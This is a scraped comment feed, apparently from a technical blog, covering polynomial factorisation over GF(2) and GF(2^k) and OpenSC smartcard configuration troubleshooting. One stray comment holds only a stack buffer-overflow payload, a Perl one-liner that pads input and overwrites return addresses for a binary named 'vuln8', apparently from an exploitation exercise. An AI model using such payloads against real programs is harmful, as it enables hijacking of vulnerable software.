I am implementing the whole thing in c++ for polynomials of degree up to 512 in [latex]GF(2)[/latex], and the algorithm was failing only for polynomials of degree above 31…

It has been hard to find but the problem was in the computation of P = P^2 % A: I was using the same data size of the polynomial in input and the exponentiation was going in overflow. Solved by doubling the size of P (2 * A.size()).

Thank you.

]]>That is not possible. Every factor of $A$ must have degree $d \le \deg(A)$, so it will be a common factor of $A$ and $X^{p^d}-X$.

]]>Or should it stop at d == A.degree() (with A the original polynomial, not the reduced one), otherwise it never exits (it may exit if $X^{p^d}−X = KA$ for some $d$, giving $A$ as GCD, but that’s not what we are looking for… amirite?)

Side note: every time T == 1 you can save time by skipping A = A//T (A should not change), right?

BTW, great article and even great series of articles!

PS: I am not sure about the syntax to use for the formulas, and there is no preview: crossing fingers…

Following your description I stumbled over a reader / smartcard problem I’d like to share with you.

I was using

– Debian 9 (Stretch)

– a PC/SC reader

– a “O2 Micro Oz776 00 00” card with CardOS M4

Problems started with “First Test: sudo”. I got the error

ERROR:pam_pkcs11.c:717: sign_value() failed: C_Sign() failed: 0x00000005

After some debugging and searching I found the solution described at https://github.com/OpenSC/OpenSC/issues/802

Shortly:

Some PS/SC readers don’t report their dwMaxAPDUDataSize, which lets openSC assume a value of 256. If this is not correct for the reader, the signing command will fail.

The workaround recommended is: “As I do not see easy fix, I will just point every user with this problem to set max_send_size and max_recv_size to 65535 in OpenSC configuration file.”

The following changes in /usr/local/etc/opensc.conf worked for me:

# The following section shows definitions for PC/SC readers.

reader_driver pcsc {

# Limit command and response sizes. Some Readers don’t propagate their

# transceive capabilities correctly. max_send_size and max_recv_size

# allow setting the limits manually, for example to enable extended

# length capabilities.

# Default: max_send_size = 255, max_recv_size = 256;

max_send_size = 65535;

max_recv_size = 65536;

I hope this helps.

]]>I have the following problem. Everytime when i try to run

pkcs15-init -C –profile pkcs15+onepin –pin 1234 –puk 123456 –label “Firas Kraiem”

it gives me the following error:

Failed to create PKCS #15 meta structure: Card command failed

Do you know what to do? I have GemPC Twin SmartCard Reader

Cheers and thanks a lot

]]>./vuln8 $(perl -e ‘print “1”x76 . “\x30\xa4\xe5\xf7” . “1”x4 . “\xe8\xdf\xff\xff”‘)

]]>One more thought about your post. I was playing around with polynomials over GF(2^k) for a given k > 1 (better not to use LaTeX tags as they seem to be disabled for comments), but the algorithm as it is stated above only works for GF(2)[X]. However, it can be generalized for GF(2^k) with a very small change in W, as follows:

W = T + T^2 + … + T^{2^{kd – 1}}

This way, W(W+1) = W^2 + W = T^{2^{kd}} + T = T^{(2^k)^d} + T, which implies that A | W(W+1).

So, the loop that computes W should be run for i in range(k*d-1).

Thanks again,

Lucio

]]>